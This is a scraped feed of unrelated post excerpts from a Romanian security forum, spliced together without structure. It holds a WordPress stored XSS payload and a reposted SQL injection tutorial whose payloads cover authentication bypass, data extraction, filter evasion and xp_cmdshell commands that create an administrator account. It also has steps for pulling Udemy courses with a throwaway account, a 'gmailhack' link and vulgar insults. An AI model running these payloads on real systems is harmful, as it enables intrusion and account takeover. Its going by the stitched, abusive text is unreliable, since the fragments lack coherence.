Leaderboard

Wordpress <= 4.3 Stored XSS [caption width="1" caption='<img src="//google.com/favicon.ico?' ">]</a><a href="http://onload='alert(1)'"> PS: Nu l-am testat.

Salut, Am decis sa inlocuim vechiul vBulletin 4 cu o platforma mult mai moderna si mai utila: IPBoard. Mentionez faptul ca este posibil sa apara probleme pe care insa o sa le rezolvam. Orice problema intampinati, postati aici sau trimiteti-mi un PM. Upgrade-ul a inceput in ianuarie, asadar tot ce s-a postat in ianuarie a disparut. De asemenea, au loc mai multe schimbari de care va rog sa tineti cont: 1. Nu se mai permit lucruri ilegale ca: root-uri, vps-uri, smtp-uri etc. 2. Au disparut cateva categorii: Club ShowOff, Games Hacks etc. Am facut putina ordine. 3. Exista un sistem de Downloads insa nu se permite upload-ul fisierelor cu drepturi de autor. 4. Accesand acest website necesita acceptarea termenilor si conditiilor. Ar fi bine sa cititi acel text, nu este lung. 5. Free stuff va fi limitat, nu se va mai posta orice cont furat. 6. La RST Market se va modera fiecare topic postat. Inca nu stim ce sa facem cu el. 7. Nu mai exista niciun VIP. Cine va fi util de acum inainte va primi VIP. 8. Nu pot oferi o lista completa de modificari, o voi actualiza cu timpul. Scopul acestui forum este sa ajute comunitatea romaneasca in domeniile IT security, programare si multe altele. Odata cu aceasta schimbare, vrem sa scapam de cei care intra aici pentru mizerii: scannere, root-uri si alte prostii care le pot aduce probleme. Daca ati venit aici pentru asa ceva, acesta nu este locul potrivit. Va vom bana pentru orice apropiere de aceste practici. Nu sunteti utili pentru comunitate si nici comunitatea nu este utila pentru voi. Am investit atat bani cat si timp in acest forum (cei din staff + altii). Nu vreau sa vorbesc in numele lor, eu vreau sa continui acest proiect deoarece acum multi ani stiam doar Counter-Strike, insa dupa ceva timp petrecut in aceasta comunitate, cu persoanele din acele timpuri, m-a ajutat si acum lucrez in domeniul IT security. Scopul acestui forum este sa ii educe pe cei noi si sa nu ii duca pe cai gresite, insa fiecare este responsabil pentru actiunile sale. Nu inseamna insa faptul ca forumul va fi complet whitehat :). Tehnici blackhat, exploituri si alte lucruri interesante sunt prezentate de catre nume mari in domeniu la conferinte internationale, deci nu ne vom feri sa le publicam aici. Incercati sa faceti si voi cate ceva, o sa vedeti ca va va ajuta mult pe viitor. Incercati sa ii ajutati pe ceilalti si veti vedea ca veti fi de asemenea ajutati. Mai multe, cu timpul. // Staff-ul RST

Descarcati: https://github.com/nishad/udemy-dl-windows/releases Creati un cont nou pe udemy, nu conteaza ce email folositi pentru ca nu trebuie verificat Deschideti cursul dorit si apasati pe Start Free Preview (apare sub Take This Course) Rulati programul astfel: udemy-dl.exe -u email -p pass <link catre curs> Screenshots pentru cei batuti in cap: Spor la invatat

eu am fost: nu merita argumente: - problemele de la curs sunt copiate din diferite surse GRATUITE de pe internet (luate de la facultati străine și traduse în română) - dacă ai chef să aprofundezi un topic cauți pe net probleme și încerci să le rezolvi, apoi verifici rezolvarea, de ce te-ai duce la un curs fizic pe care să dai bani? - să zicem că te-ai duce pentru că „profesor”, doar că instructorii de acolo am impresia ca nu sunt instructori, sunt orice altceva în sensul că nu știu să dea lămuriri, nu se adaptează la lipsa de cunoștințe preliminare a cursanților (unii chiar vin acolo sperând că vor putea învăța programare așa cum le promite reclama, dar în reliatate află că mai durează un an sau doi de muncă și învățare) - am impresia că nu toți instructorii au atestate, deși ei susțin că le au, totuși nu contează atestatul, un instructor este bun dacă se adaptează la omul din fata lui si face tot posibilul ca indivisul ala sa invete - înveți de la zero dacă ai capacitatea de a învăța copiind exerciții de la colegii mai avansați și dacă înțelegi modul în care funcționează codul - chestia asta o poti face si acasa, fără să fie nevoie să plătești aprox 1000 euro - dacă ai chef de socializare și de ieșit din casă, du-te, îți faci cunoștințe, prieteni, networking, chestii - dacă ai bani plătește pe cineva după ce îți pui bazele singur, sau pur si simplu invata singur si găsește-ți de lucru mergând la interviuri pe entry-level positions unde să prezinți prorpiile proiecte, diplomele lor nu valorează nimic, oricum, fără o facultate relativ asemănătoare ca profil cu IT-ul (gen ase, mate-info de la univ bucuresti si altele asemenea) - la job vei avea de demonstrat practic abilități - chiar dacă te duci acolo, fă-ți un bine și învață algoritmi și teorie java dinainte, altfel îți pierzi vremea aiurea Concluzie: e doar gargară de marketing, poveștile cu indivizi care s-au angajat prin bănci pe la IT departments după doar 2 luni de curs nu sunt altceva decât povești - la mine în grupă au fost cel puțin 2 persoane care deja știau programare bine și care puteau fi angajați, dar ghici cine e încă pe bară după ce a terminat cursul? - poveștile alea sunt doar povești

Dar de ce nu iti iei tu mai bine hosting moca, si iti pui un CMS pe el, cum ar fi Wordpress, Joomla, pula mea.

Asa cum spune si titlul. Caut programator full time cu cunostinte medii spre avansate in limbajele principale de programare: php, mysql, javacript si sa fie capabil sa rezolve si sa invete fiecare obstacol de limbaj nou intalnit. (css, html nici nu se pune problema). Salariu 1000 euro cu posibilitate de crestere + bonusare. Se lucreaza de la sediu, proiectele sunt atractive, iar stresul de la locul de munca 0. Locatie: Bucuresti. Astept PM.

Pai si cu te ajuta sa afli ca se fute cu altii ?

Hai ca iti fac eu site'ul in Joomla daca umplii memoria camerei cu niste porneala de calitate. Pentru eshop iti cer bani ca munca nu e degeaba, e scumpa Daca erai baiat destept puneai si tu linkul de la camera sa vada si lumea ce minunatie ai. Da-mi mesaj si ne apucam de treaba daca imi place camera.

"android.net.wifi.WIFI_STATE_CHANGED is sent only when WiFi is enabled or disabled. You need to catch android.net.wifi.STATE_CHANGE too if you want to receive broadcast event when you are connected to or disconnected from a WiFi network." Telefonul are un soft de cacat probabil.

O sa intreb la HR daca se poate, dar in principal sunt Full Time. Daca problema e cumva prezenta la facultate, cred ca nu e chiar o problema. Edit: Acel post este doar full-time.

Am eu cont cu 2 plati in valoare de 200 de euro scoase de pe cont.

The best resources for learning exploit development Fabio Baroni Penetration tester Books Hacking - The art of exploitation A bug Hunter's Diary: A Guided Tour Through the Wilds of Software Security The Shellcoder's Handbook: Discovering and Exploiting Security Holes Sockets, shellcode, Porting, and coding: reverse engineering Exploits and Tool coding for security professionals Writing Security tools and Exploits Buffer overflow attacks: Detect, exploit, Prevent Metasploit toolkit for Penetration Testing, exploit development, and vulnerability research TUTORIALS Corelan.be https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/ https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/ https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ Massimiliano Tomassoli's blog http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/ Samsclass.info https://samsclass.info/127/127_F15.shtml Securitysift.com http://www.securitysift.com/windows-exploit-development-part-1-basics/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits http://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows Justbeck.com http://www.justbeck.com/getting-started-in-exploit-development/ 0xdabbad00.com http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ fuzzysecurity.com Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] sploitfun.wordpress.com https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ sneakerhax.com http://sneakerhax.com/jumping-into-exploit-development/ community.rapid7.com https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series resources.infosecinstitute.com http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ rafayhackingarticles.net http://www.rafayhackingarticles.net/2011/07/from-minor-bug-to-zero-day-exploit.html TRAININGS Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Module 12 of Advanced penetration testing cource on Cybrary.it https://www.cybrary.it/course/advanced-penetration-testing/ Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer infiniteskills.com http://www.infiniteskills.com/training/reverse-engineering-and-exploit-development.html COURSES Corelan https://www.corelan-training.com Offensive Security https://www.offensive-security.com/information-security-training/advanced-windows-exploitation/ AWE (Advanced windowsexploitation) SANS https://www.sans.org/course/advance-exploit-development-pentetration-testers SANS SEC760: Advancedexploitdevelopment for Penetration Testers Udemy https://www.udemy.com/windows-exploit-development-megaprimer/learn/#/ windows exploit developmentMegaprimer by Ajin Abraham TOOLS IDA Pro OllyDbg WinDbg Mona.py HEAP EXPLOITATION TECHNIQUES https://github.com/shellphish/how2heap VULNERABLE APPLICATIONS Exploit-exercises.com https://exploit-exercises.com/protostar/ Protostar https://exploit-exercises.com/fusion/ Fusion 28 hacking sites to practise your skills in a legal way https://www.peerlyst.com/blog-post/practise-your-infosec-skill-on-these-legal-28-hacking-sites EXPLOITS database https://www.exploit-db.com https://www.milw00rm.com http://0day.today https://packetstormsecurity.com http://www.securityfocus.com http://www.windowsexploits.com http://iedb.ir http://www.macexploit.com Sursa: https://www.peerlyst.com/posts/the-best-resources-for-learning-exploit-development

SQL Injection: Exploitation Published on February 9, 2016 By HollyGraceful on Injection, OWASP Top 10, Web Application Security Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise. SQL and a SQL Injection Primer For those less familiar with SQL it is a language used for storing, retrieving, modifying and removing data from a database. It can often also be used to read or modify files on the remote system and execute operating system commands. There are many variations such as Microsoft SQL, MySQL or PostgreSQL. There are different query types in SQL, such as SELECT, INSERT, UPDATE and DELETE as well as the idea of “Stored Procedures”. These are used for retrieving data from the database (SELECT), adding new rows to a table (INSERT), taking a table row and modifying it (UPDATE) or removing rows from a table (DELETE). There are many different stored procedures however an interesting one is the MSSQL procedures xp_cmdshell which can be used for executing commands on the remote database host. SELECT Statements retrieve data from the database and look like: SELECT column FROM table WHERE condition is true For example the following could be used for a login system: SELECT username,password FROM users WHERE username='$INPUT1$' AND password='$INPUT2$'; Where $INPUT1$ and $INPUT2$ is text taken from the user of the application. Statements are separated by semi-colons, so two statements could be “stacked” and executed one after the other by separating them with a semi-colon. Developers can add comments into a statement by preceding the comment with a ” −− ” before the comment, which makes the SQL parser ignore any following text. The above statement concatenates user input into the query and is therefore vulnerable to SQL injection, as an attacker can simply add characters within $INPUT1$ or $INPUT2$ to alter the logic of the statement. Taking this into account an attacker could utilize the following payload for INPUT1 to cause a login bypass: x’ OR 1=1 −− This works as the input would change the command to the following: SELECT username,password FROM users WHERE username='x' OR 1=1 -- ' AND password='$INPUT2$'; As you can see from the above, the double dash has caused the password check to be “commented out” so that it has no effect. Also if you remember back to the first SQL command I showed highlights that the SELECT statement evaluates the WHERE clause to determine if it is a Boolean true. That’s what the OR 1=1 part of the input achieves, as one always equals one. The effect on many applications that are vulnerable to SQL injection in the login form is that all account data will be returned and the database will simply log in the attacker in as the first user in the database. As you can see the attacker has altered the intended logic of the statement and they could use this to bypass authentication, cause the database to leak confidential information or even execute functions such as executing operating system commands. Many times it can be tempting to leave SQL exploitation down to automated tools, but I recommend all juniour Penetration Testers get as deep into manual exploitation as they possible can so that they can really understand what the tool is up to, especially in preparation for the day that the tool fails and you’ve got to crack a can of caffeine and do it all manually. Detecting Vulnerable Functions Detecting SQL injection is fairly simple if errors are enabled and displayed in raw form to the user. If an attacker adds an apostrophe the the input it will cause an unbalanced number of quote marks and an error like “You have an error in your SQL syntax” will be shown, great you have a valid SQL injection point, however if errors are customized or simply not rendered to the user then you have to try a little harder! the most effective way to do this is to alter the query in such a way that it could only possibly be that you have successfully injected into SQL. So very SQL-like syntax being parsed in the expected way. Consider he following query which loads a news article from the database to display on an fictitious web application: SELECT id,title,content FROM tblArticles WHERE id=$input Which is accessed through the following URL: http://sql.example.org/news?id=100 Now a simple way to determine is the parameter “id” is vulnerable to injection would be would be to try the following URLs and see how the server reacts: http://sql.example.org/news?id=100 http://sql.example.org/news?id=101 http://sql.example.org/news?id=101-1 If the server is appropriately vulnerable it would be expected that the first and second URL show different articles whereas the third one is evaluated by the database and produces the same output as the first URL. If the statement 101-1 is not evaluated then there’ll be a notable change in output. The above example, obviously, will only work on integer inputs, if the id parameter was instead a string input like this: http://sql.example.org/news?page=example With the above case it’s possible to utilize string concatenation in a similar way, where if the string is evaluated and concatenated then the output should not change whereas if it is no evaluated then a noticeable change in output will occur. The method of concatenation differs between back-end database types however if one works you have the added benefit of fingerprinting the database type! MSSQL: exa'+'mple With URLs a + is space, use %2b instead (URI encoded plus sign)! MySQL: exa' 'mple (that's a space between two apostrophes) Oracle: exa'||'mple An additional way of detecting of detecting functions that are vulnerable is to concatenate a simple conditional at the end of the input, such as: AND 1=1 -- AND 1=2 -- The idea with these payloads is that the top option of 1=1 will not alter the logic of the query in anyway (as 1 does in fact equal 1) although the second payload will break the query and therefore the application would operate in a noticeably different way, such as missing text on the page (and therefore a shorter content length), a faster response time, a visible error or a different status code. The application should also have the same effect regardless of what the conditional was, so 1=1, 2=2 and 3=3 should all have the same effect, as should payloads such as: AND (SELECT @@version)=(SELECT @@version) -- The above payload is useful because its very SQL-like and whilst there may be some application logic which interprets 1=1 it’s very unlikely that outside of a SQL injection context you’ll get the same response from the above payload. It’s important to note however, that this payload is vendor specific, so the above will work on MSSQL and MySQL but not PostgreSQL. There’s a suitable payload for each of the backends however. The PostgreSQL equivalent would be: AND (SELECT version())=(SELECT version()) -- Types of Injection Whilst the above example is a simple demonstration of SQL and how injection can be use to the benefit of an attacker, as the attacker has the full flexibility of SQL at their disposal there is much more that they can do than simply bypassing an application’s login form. There are different types of injection covered within this article are: Boolean Error Union Stacked Time In terms of injection it’s not exactly a case of preference but simply what is available in the context of the vulnerable parameter. You’ll definitely prefer to find Union or Error based over Boolean and Time based due to the effort levels required to exploit them but you’ll have to deal with what you’re given when it comes down to it. Different injection types will be available depending on the original query which you are injecting into as well as any filters that are in place to prevent malicious input. Exploitation There are five injection types and I’ll cover them each in turn, once you get the hang of the first however the others operate much as you’d expect but I’ll run through a full working example of each to make sure there’s no important details missed out, plus it’ll show how I generate payloads and build up from detection to data exfiltration. Error Based Error-based SQL injection comes about when errors from the SQL database are exposed to the attacker by being embedded in application responses. Detection is generally as simple as placing an apostrophe in the parameter an you’d receive an error along the lines of: Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string The exact error depends on the backend database. These errors can be controlled and by crafting input you can cause the error to contain data from the database itself. For example, if you are injecting into an integer input you can cause a type clash which will disclose information like this: AND 1 in (SELECT @@version) with input like this you’ll get an error along the following lines: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)' to data type int. This works as the database attempts to convert the string to an integer, cannot, and throws an error that reveals the information. This means that an attacker can place any select statement that returns a string within the brackets of the payload and the error will contain the desired output. However it’s a touch more complex if you’re injecting into a string, but only a touch. As you couldn’t cause a cast error by converting to an integer you can expand the payload to be something along these lines: AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) -- Here you can replace (SELECT 1) with the SQL statement you would like to execute and retrieve the contents from. The way that this injection works is to concatenate the desired data onto the end of the string “Extract” and then attempts to cast that to an integer which causes an error, so in the case of the example the resulting error would be: Error Type: Microsoft SQL Native Client (0x80040E07) Conversion failed when converting the varchar value 'Extract:1' to data type int. So an attacker can effective run arbitrary SQL statements and capture the output easily if errors are embedded within the application. If errors are gracefully handled however this doesn’t stop an attacker completely, they just have to use a different injection technique. Union Based The UNION operator allows two or more SELECT statements to be combined, the idea being that a developer may run a query such as listing all of the products available in a store and an attacker can combine this with an additional query, such as listing all of the usernames and passwords in the customers table. To utilise a union though the attacker must request the same number (and type) as the original query and therefore needs to know how many columns are being used. There are two ways to do this, the first is to use NULLs in place of the columns to determine how many columns there are, such as: UNION SELECT NULL -- UNION SELECT NULL, NULL -- UNION SELECT NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL -- …and continue until you’ve determined how many columns there are – if you get the incorrect number of columns an error condition will occur and if you get the right number then the application will run unhindered. You can then swap out the NULL with datatypes to determine which ones are correct, such as: UNION SELECT 'abcd', NULL, NULL, NULL -- UNION SELECT 1, NULL, NULL, NULL -- Work them out one at a time until you end up with something like this: UNION SELECT 1, 'string', 'string', 'string' -- At this point you have a working SELECT statement where the output will be appended to the normal output the application gives! If you’ve got a lot of columns and writing out all of those NULLs is too much like hard work there’s another method of doing the original column count enumeration, using ORDER BYs. If you attempt to order by a column number which is higher than the number of columns it’ll throw an error. So you can start low and work up until you see an error: ORDER BY 1 -- ORDER BY 2 -- ORDER BY 3 -- ORDER BY 4 -- Blind Boolean If the application gracefully errors, and it’s not possible to combine queries with UNION, then an attacker can use inference to determine the answer to queries about the database. The payloads we used earlier to prove the existence of injection are simple examples of this: AND 1=1 -- AND 1=2 -- Essentially these are asking yes or no questions of the database and the result shows the answer. “Does 1=1?” Yes of course it does and therefore the normal output of the application will be visible. “Does 1=2”? No it does not and therefore there should be a noticeable chance, this could be in the response length, time of execution, or HTTP response code (just like before). However we can expand up on this idea to ask more in-depth questions of the database, as long as we can phrase them as Yes/No questions. For example, “Is the first letter of the current user the letter ‘a'”? That’d look something like this: AND SUBSTR(SELECT user_name(), 1, 1)='a' -- We can cycle through: b, c, d, e until we get a “true” response – then move on to the second character and so on. A time consuming and request intensive process but it can be automated quite easily with python (or Burp Intruder!) Time-Based Blind If the application does not embed responses so you can’t use UNION, if it doesn’t show error messages an it’s not possible to determine the output of a boolean then there is still hope! If you can’t infer the output to a boolean through application responses you can add a notable difference yourself through time delays. Effectively using IF statements and delays you can ask the application “Does A=A? If so, please delay your response by five seconds and if not then immediately respond”. Then by detecting lag in the response you’ll get your answer! Simple…but very time consuming… A payload like this will work for MSSQL: IF('a'='a') WAITFOR DELAY '0:0:5' -- Then you can simply replace the ‘a’=’a’ with whatever yes/no question it was that you’d like to ask. Stacked Queries (and possibly command execution!) A final thing which is worth noting, is that it may be possible to close off the developers query and start a completely new query from scratch, something as simple as: ; WAITFOR DELAY '0:0:5'; -- If this works you’ll get a delay as you did in the previous example, however as you’re able to execute new full queries it is also potentially possible to execute stored procedures – such as xp_cmdshell on MSSQL. This stored procedure allows for the execution of operating system commands on the database server. There are two problems. The first problem is, on modern MSSQL servers xp_cmdshell is disabled by default…but you can re-enable it through SQL Injection! The second problem is that to execute this procedure, you probably need to be running as the sa user. If you’re lucky those and you are sa, here’s the steps to execute OS commands: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Now that’s done, you can go ahead and use the xp_cmdshell: exec master..xp_cmdshell 'dir c:\'; -- That’ll execute the dir command! One…small hitch…the output of the command isn’t returned…an easy way to get around that would be to just attack the application blind, for example: exec master..xp_cmdshell 'net user foobar Password123 /add'; -- exec master..xp_cmdshell 'net localgroups "Administrators" /add'; -- The above command adds a new local administrator to the remote server. That might help. Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection! You can create a table and store the output of a command to it with the following: ; create table #output (id int identity(1,1), output nvarchar(255) null); ; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:'; Then to read the contents out with a SELECT statement like this one: ; select * from #output where output is not null order by id; A quick note on filter evasion… If there’s a filter in place to prevent the execution of payloads above then there are a few things to try. First of all be aware that you can flip case without any problem: SELECT sElEcT Also if whitespace is filtered, then you can replace spaces with comments for the same effect: AND 1=1 -- /**/AND/**/1=1/**/-- Finally if you can’t comment out the end of a query you can “gracefully close” the statement instead: ' AND 1=1 -- ' AND 1=1 OR 'a'='a Defending against Injection As I said at the start of this article the issue really is that user input is insecurely concatenated into a query. So there’s two things to note here, the first is concatenation and the fix here is instead to use “parametrized” or “prepared” statements, these are available in all modern languages and frameworks, these effectively separate the query from the user input so that the database cannot mix the two up and effectively stop SQL injection attacks on their own. An example for PHP can be found in the PHP documentation here, which gives a flavour of the general idea. However another thing to consider, to stop other kinds of injection and web application attack, it’s a good idea to consider filtering all user input. I’ve written about user input filtering tactics here. Sursa: https://www.gracefulsecurity.com/sql-injection-exploitation/

FAST FULL-FEATURED SSL SCANNER Posted on 10/02/2016, 13:06 By Johnny Cash SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Key features Multi-processed and multi-threaded scanning: it’s very fast. Support for all SSL protocols, from SSL 2.0 to TLS 1.2. SSLyze can also be used as a library, in order to run scans and process the results directly from Python. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP. Support for client certificates when scanning servers that perform mutual authentication. Installation SSLyze can be installed directly via pip: pip install sslyze or git clone https://github.com/nabla-c0d3/sslyze /opt/sslyze cd /opt/sslyze pip install -r requirements.txt --target ./lib Usage python sslyze_cli.py –regular www.yahoo.com:443 www.google.com Platforms SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan. Sursa: http://securityblog.gr/3267/fast-full-featured-ssl-scanner/

D?-o-n mor?ii ei de treab?! Ce mari hackeri vre?i voi s? deveni?i dac? nu sunte?i în stare s? decoda?i un 46esab? V? trebuie mult mai mult? ambi?ie ?i studiu individual.

1. De unde ai copiat prostia asta? 2. Unixcod-ul e vechi rau 3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici 4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100% 5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16

vreau s-o fut pe ma-ta, ofer juma de camera d-aia

Scuze de intarziere. @hapy.end vezi aici: http://x.co/gmailhack